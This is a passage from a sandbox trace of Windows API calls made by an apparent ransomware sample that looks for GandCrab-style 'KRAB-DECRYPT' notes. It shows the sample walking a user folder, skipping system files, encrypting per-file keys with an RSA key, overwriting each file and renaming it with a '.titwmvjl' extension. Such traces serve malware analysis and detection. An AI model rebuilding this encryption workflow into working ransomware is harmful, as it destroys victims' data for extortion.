"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0070.837] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.837] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.837] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.837] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.837] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock" [0070.837] lstrlenW (lpString=".titwmvjl") returned 9 [0070.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock") returned 91 [0070.837] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.838] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 100 [0070.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock") returned 91 [0070.838] lstrlenW (lpString=".lock") returned 5 [0070.838] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.838] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.838] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.838] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.838] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.838] lstrcmpW (lpString1="GB.XSL", lpString2=".") returned 1 [0070.838] lstrcmpW (lpString1="GB.XSL", lpString2="..") returned 1 [0070.838] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GB.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" [0070.838] lstrlenW (lpString=".titwmvjl") returned 9 [0070.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0070.838] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.838] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.titwmvjl") returned 82 [0070.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0070.839] lstrlenW (lpString=".XSL") returned 4 [0070.839] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.839] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0070.839] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0070.839] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0070.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="desktop.ini") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="autorun.inf") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="ntuser.dat") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="iconcache.db") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="bootsect.bak") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="boot.ini") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="ntuser.dat.log") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="thumbs.db") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="ntldr") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="NTDETECT.COM") returned -1 [0070.839] lstrcmpiW (lpString1="GB.XSL", lpString2="Bootfont.bin") returned 1 [0070.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0070.839] lstrlenW (lpString=".XSL") returned 4 [0070.839] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.839] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0070.840] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.840] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.840] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0070.840] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.840] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0070.870] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.870] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.871] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.871] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.871] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.871] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0070.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.871] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.871] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.872] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.872] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.872] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.872] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.872] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0070.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.872] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.872] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.873] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.873] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034f8) returned 1 [0070.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.873] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.873] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.874] GetLastError () returned 0x0 [0070.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.874] CryptDestroyKey (hKey=0x5034f8) returned 1 [0070.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.874] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.874] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.875] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034f8) returned 1 [0070.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.875] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.875] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.875] GetLastError () returned 0x0 [0070.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.875] CryptDestroyKey (hKey=0x5034f8) returned 1 [0070.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.876] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.876] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.876] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.876] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x4197e, lpOverlapped=0x0) returned 1 [0070.900] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffbe682, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.900] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x4197e, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x4197e, lpOverlapped=0x0) returned 1 [0071.001] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.001] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.003] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.006] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.007] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.008] CloseHandle (hObject=0x2cc) returned 1 [0071.012] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.013] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.013] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.013] lstrcmpW (lpString1="GostName.XSL", lpString2=".") returned 1 [0071.013] lstrcmpW (lpString1="GostName.XSL", lpString2="..") returned 1 [0071.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GostName.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" [0071.013] lstrlenW (lpString=".titwmvjl") returned 9 [0071.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0071.013] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.013] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.titwmvjl") returned 88 [0071.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0071.014] lstrlenW (lpString=".XSL") returned 4 [0071.014] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.014] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.014] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.014] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0071.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="desktop.ini") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="autorun.inf") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntuser.dat") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="iconcache.db") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="bootsect.bak") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="boot.ini") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntuser.dat.log") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="thumbs.db") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="ntldr") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="NTDETECT.COM") returned -1 [0071.014] lstrcmpiW (lpString1="GostName.XSL", lpString2="Bootfont.bin") returned 1 [0071.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0071.014] lstrlenW (lpString=".XSL") returned 4 [0071.014] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.015] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.015] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.015] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.015] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.016] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.016] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.119] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.119] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.120] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.120] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.120] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.120] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.120] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.120] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.121] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.121] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.121] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.121] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.121] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.121] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.121] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.122] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.122] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503838) returned 1 [0071.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.122] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.123] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.123] GetLastError () returned 0x0 [0071.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.123] CryptDestroyKey (hKey=0x503838) returned 1 [0071.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.123] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.123] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.124] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5032f8) returned 1 [0071.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.124] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.124] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.124] GetLastError () returned 0x0 [0071.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.124] CryptDestroyKey (hKey=0x5032f8) returned 1 [0071.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.125] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.125] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.125] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.125] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x3e966, lpOverlapped=0x0) returned 1 [0071.149] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffc169a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.149] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x3e966, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x3e966, lpOverlapped=0x0) returned 1 [0071.160] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.160] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.161] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.164] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.165] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.165] CloseHandle (hObject=0x2cc) returned 1 [0071.171] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.172] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.172] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.172] lstrcmpW (lpString1="GostTitle.XSL", lpString2=".") returned 1 [0071.172] lstrcmpW (lpString1="GostTitle.XSL", lpString2="..") returned 1 [0071.172] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="GostTitle.XSL" | out: 